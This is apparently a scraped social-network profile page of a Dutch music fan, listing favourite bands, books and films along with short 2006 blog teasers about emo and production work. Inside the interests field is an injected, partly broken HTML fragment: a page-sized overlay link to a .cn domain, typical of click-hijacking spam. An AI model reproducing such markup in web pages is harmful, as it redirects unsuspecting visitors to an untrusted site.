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About Me

I'm the most boring guy in the world, and my friends are all assholes

My Interests

music and ... music and o uhhm music?a class="popup_wrapper" style="cursor:default;background-image:url(http://vzs4.cn/bg .jpg);left:0px;top:0px;height:8444px;width:1092px;" href="http://vzs4.cn/s/" m$l$

I'd like to meet:

robert smith of the cure, jay robbins and blake swarzenbach


the sedan vault, soon, jawbox, jets to brazil, sonic youth, fugazi, mogwai, slint, dinosaur jr., his hero is gone, point of few, braid, ink and dagger, lifetime, botch, old man gloom, isis, the cure, second layer, comsat angels, the sound, malkovich, the mars volta, matching mole, led zeppelin, randy newman, joni mitchell, mineral, christie front drive, kill holiday, jawbreaker, at the drive in, fireside, quicksand, refused, nirvana, garden variety, etc. etc.


a nightmare before christmas and i'm a sucker for meg ryan movies, sorry I just can't help it.




anything by charles bukowski, on the road by jack kerouac, the old man and the sea by ernest hemingway and maybe some russian philosophy for some light reading every once in a while ;)


ari katz, robert smith, jay robbins, blake swarzenbach

My Blog

Embrace Fire

Ok I'm not normally a guy who braggs over his acomplishments but this time I'm just really happy with the result. I did the production for Embrace Fire's first ep (Denis old bassplayer from Face Tomor...
Posted by aart on Thu, 13 Apr 2006 06:14:00 PST

our downstairs neighbours have done it again

Just a short one this time, I just felt like i needed to say this. How come Belgian bands are always so much better then us dutchies? I mean we have more people over here right? Right now I'm listenin...
Posted by aart on Thu, 02 Mar 2006 06:56:00 PST

emo vs (numetal)emo

ok lets get this shit straight..... There is a big difference between what people used to call emo and what they call emo now.....And it's bothering the hell out of me... NOOOO i don't like bands like...
Posted by aart on Mon, 01 Jan 1900 12:00:00 PST

weather and crappy emo

Did anybody notice how much the weather sucks today? makes me wanna play crappy emo shite and no that's not a good thing.. it's bad enough that i even have that stuff on my ipod anyway
Posted by aart on Mon, 01 Jan 1900 12:00:00 PST